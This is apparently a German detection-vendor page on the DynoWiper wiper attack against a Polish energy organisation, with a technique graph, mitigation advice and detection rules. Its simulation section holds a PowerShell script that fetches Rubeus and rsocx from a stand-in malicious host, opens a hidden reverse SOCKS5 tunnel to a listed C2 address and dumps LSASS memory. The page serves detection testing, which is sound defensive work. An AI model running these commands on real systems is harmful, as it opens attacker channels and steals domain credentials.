Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
DynoWiper ist ein destruktiver Wiper, der gegen eine Organisation im Energiesektor in Polen eingesetzt wurde und mehrere Endpunkte in den Operationen beeinflusste. Die ausführbaren Dateien wurden an einem gemeinsamen Netzwerkstandort hinterlegt und direkt von dort gestartet. ESET führt die Aktivität mit mittlerer Sicherheit auf Sandworm zurück. Nach der Ausführung beschädigt die Malware gezielt Dateien mit zufälligen Bytes und löst einen erzwungenen Neustart aus, um die Auswirkungen abzuschließen.
Untersuchung
ESET hat drei Proben wiederhergestellt — schtask.exe, schtask2.exe und _update.exe — die unter C:inetpubpub abgelegt wurden. Eingebettete PDB-Pfade deuten darauf hin, dass die Binärdateien in einer Vagrant-Umgebung kompiliert wurden. Reverse Engineering zeigte eine dreistufige Wiping-Routine, bei der zwei Varianten eine fünfsekündige Pause zwischen den Phasen einfügen. Nach dem Kompromittierungsprozess beinhalteten die Artefakte auch das Kerberos-Tool Rubeus und einen rsocx SOCKS5-Proxy im Netzwerk des Opfers.
Minderung
ESET PROTECT auf den betroffenen Systemen blockierte alle drei Varianten und begrenzte so den Schaden. Reduzieren Sie die Exposition, indem Sie die Erstellung unautorisierter geplante Tasks verhindern und unfreiwillige Schreibvorgänge in freigegebene Verzeichnisse überwachen. Fügen Sie Anwendungs-Whitelist hinzu und verhindern Sie, soweit möglich, die Ausführung von Netzlaufwerken.
Antwort
Identifizieren und isolieren Sie Hosts, die schtask.exe, schtask2.exe oder *_update.exe von einem Share ausführen. Bewahren Sie flüchtige Beweise, überprüfen Sie geplante Tasks und PowerShell-Bereitstellungsspuren und entfernen Sie Tools wie Rubeus und rsocx. Führen Sie eine vollständige forensische Untersuchung durch und stellen Sie Daten aus überprüften sauberen Backups wieder her.
graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef action fill:#99ccff classDef malware fill:#ffd699 %% Nodes action_ingress[„<b>Aktion</b> – <b>T1105 Übertragung von Eindringwerkzeugen</b><br/><b>Beschreibung</b>: Zusätzliche Werkzeuge wie Rubeus.exe und rsocx wurden in die kompromittierte Umgebung heruntergeladen.“] class action_ingress technique tool_rubeus[„<b>Werkzeug</b> – <b>Name</b>: Rubeus.exe<br/><b>Beschreibung</b>: Führt Diebstahl und Missbrauch von Kerberos-Anmeldeinformationen durch.“] class tool_rubeus tool tool_rsocx[„<b>Werkzeug</b> – <b>Name</b>: rsocx<br/><b>Beschreibung</b>: SOCKS5-Proxy zur Weiterleitung von Command-and-Control-Verkehr.“] class tool_rsocx tool action_cred_dump[„<b>Aktion</b> – <b>T1003.001 LSASS-Speicher</b><br/><b>Beschreibung</b>: Der Speicher des LSASS-Prozesses wurde über den Task-Manager gedumpt, um Anmeldeinformationen zu erhalten.“] class action_cred_dump technique action_powershell[„<b>Aktion</b> – <b>T1059.001 PowerShell</b><br/><b>Beschreibung</b>: PowerShell-Skripte wurden ausgeführt, um bösartige Binärdateien bereitzustellen und weitere Aktionen zu ermöglichen.“] class action_powershell technique action_cmd[„<b>Aktion</b> – <b>T1059.003 Windows-Befehlszeile</b><br/><b>Beschreibung</b>: cmd.exe wurde verwendet, um Shell-Befehle auszuführen und den Wiper zu orchestrieren.“] class action_cmd technique action_gpo_discovery[„<b>Aktion</b> – <b>T1615 Gruppenrichtlinien-Erkennung</b><br/><b>Beschreibung</b>: Gruppenrichtlinienobjekte wurden identifiziert, um eine großflächige Bereitstellung vorzubereiten.“] class action_gpo_discovery technique action_gpo_modify[„<b>Aktion</b> – <b>T1484 Änderung von Domänen- oder Mandantenrichtlinien</b><br/><b>Beschreibung</b>: Gruppenrichtlinien wurden geändert, um die DynoWiper-Binärdatei domänenweit zu verteilen.“] class action_gpo_modify technique action_schtask[„<b>Aktion</b> – <b>T1053 Geplanter Task</b><br/><b>Beschreibung</b>: Geplante Tasks wurden mit schtask.exe erstellt, um die Ausführung des Wipers zu persistieren.“] class action_schtask technique action_data_removable[„<b>Aktion</b> – <b>T1025 Daten von Wechselmedien</b><br/><b>Beschreibung</b>: Werkzeuge und der Wiper wurden im freigegebenen Netzwerkverzeichnis C:\\inetpub\\pub\\ abgelegt.“] class action_data_removable technique action_file_discovery[„<b>Aktion</b> – <b>T1083 Datei- und Verzeichnis-Erkennung</b><br/><b>Beschreibung</b>: Dateien und Verzeichnisse auf festen und wechselbaren Laufwerken wurden unter Ausschluss von Systemordnern aufgelistet.“] class action_file_discovery technique action_wipe[„<b>Aktion</b> – <b>T1561.001 Löschen von Datenträgerinhalten</b><br/><b>Beschreibung</b>: Dateiinhalte wurden mit Zufallsdaten überschrieben und dadurch gelöscht oder beschädigt.“] class action_wipe technique action_reboot[„<b>Aktion</b> – <b>T1529 Systemherunterfahren oder Neustart</b><br/><b>Beschreibung</b>: Nach dem Löschen wurde ein erzwungener Neustart durchgeführt, um die Zerstörung abzuschließen.“] class action_reboot technique action_proxy[„<b>Aktion</b> – <b>T1090.002 Externer Proxy</b><br/><b>Beschreibung</b>: rsocx wurde so konfiguriert, dass ein externer SOCKS5-Proxy 31.172.71.5:8008 verwendet wird, um den Command-and-Control-Verkehr zu verschleiern.“] class action_proxy technique malware_dyno[„<b>Malware</b> – <b>Name</b>: DynoWiper<br/><b>Beschreibung</b>: Wiper-Nutzlast, die Daten überschreibt und einen Neustart auslöst.“] class malware_dyno malware %% Connections action_ingress –>|lädt herunter| tool_rubeus action_ingress –>|lädt herunter| tool_rsocx tool_rubeus –>|ermöglicht| action_cred_dump tool_rsocx –>|stellt bereit| action_proxy action_cred_dump –>|liefert Anmeldeinformationen für| action_powershell action_powershell –>|führt aus| action_cmd action_cmd –>|orchestriert| action_wipe action_gpo_discovery –>|führt zu| action_gpo_modify action_gpo_modify –>|verteilt| malware_dyno action_schtask –>|erstellt Aufgabe für| malware_dyno action_data_removable –>|speichert| tool_rubeus action_data_removable –>|speichert| tool_rsocx action_data_removable –>|speichert| malware_dyno malware_dyno –>|führt aus| action_file_discovery malware_dyno –>|führt aus| action_wipe action_wipe –>|löst aus| action_reboot action_proxy –>|leitet Verkehr weiter für| malware_dyno
Angriffsablauf
Erkennungen
Potenzieller Malware-Selbstentfernung oder Stderr-Verdeckungsbetrieb (über cmdline)
Ansehen
Herunterfahren für das Erzwingen eines Systemstopps oder Neustarts verwendet (über cmdline)
Ansehen
IOCs (HashSha1) zur Erkennung: ESET Research DynoWiper Update: Technische Analyse und Zuordnung
Ansehen
IOCs (SourceIP) zur Erkennung: ESET Research DynoWiper Update: Technische Analyse und Zuordnung
Ansehen
IOCs (DestinationIP) zur Erkennung: ESET Research DynoWiper Update: Technische Analyse und Zuordnung
Ansehen
Erkennung der DynoWiper-Bereitstellung über geplante Task-Ausführung [Windows-Datei-Ereignis]
Ansehen
Erkennung von bösartigen Tools und LSASS-Speicher-Dumping [Windows-Prozesserstellung]
Ansehen
Simulation Ausführung
Voraussetzung: Die Telemetrie- & Basislinien-Pre-Flight-Überprüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die so gestaltet ist, dass sie die Erkennungsregel auslöst. Die Befehle und Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
- Richten Sie einen Reverse SOCKS5-Proxy ein unter Verwendung von
rsocx.exe. Der Angreifer lädt die Binärdatei von einem externen Server herunter, platziert sie in%TEMP%, und führt sie mit dem Argument-r 31.172.71.5:8008aus, um einen Rückkanal zurück zum C2-Host zu erstellen. - Führen Sie Kerberos-Ticket-Missbrauch durch mit
rubeus.exe. Das Tool wird ausgeführt, um ein Kerberos-Ticket-Granting Ticket (TGT) für das Domain-Admin-Konto anzufordern und anschließend ein Service-Ticket (s4u2self). - Dumpt LSASS-Speicher unter Verwendung von
procdump.exe(eine häufige Alternative zum Task-Manager), um Anmeldeinformationen zu erfassen. Sysmon zeichnet ein Prozesszugriffsereignis auf, bei dem derprocdump.exeProzess des Angreiferslsass.exemit der Zugriffsmaske0x1010öffnet (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
- Richten Sie einen Reverse SOCKS5-Proxy ein unter Verwendung von
-
Regressionstestskript:
# ------------------------------------------------------------- # Simulationsscript – löst die Sigma-Regel für rsocx, rubeus, # und LSASS-Dump. Führen Sie es mit Administratorrechten aus. # ------------------------------------------------------------- # 1. rsocx.exe bereitstellen (Reverse SOCKS5 Proxy) $rsocxPath = "$env:TEMPrsocx.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden # 2. rubeus.exe bereitstellen (Kerberos-Missbrauch) $rubeusPath = "$env:TEMPrubeus.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden # 3. LSASS mit procdump abdumpen (erfordert Sysinternals) $procdumpPath = "$env:TEMPprocdump.exe" Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip" Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1 if ($procdumpExe) { Copy-Item $procdumpExe.FullName $procdumpPath -Force Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait } Write-Host "Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme." -
Aufräumbefehle:
# Beenden Sie alle verbleibenden bösartigen Prozesse Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force # Entfernen Sie Binärdateien und Dump-Dateien Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue # Optional: temporäre Download-Verzeichnisse löschen Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Bereinigung abgeschlossen."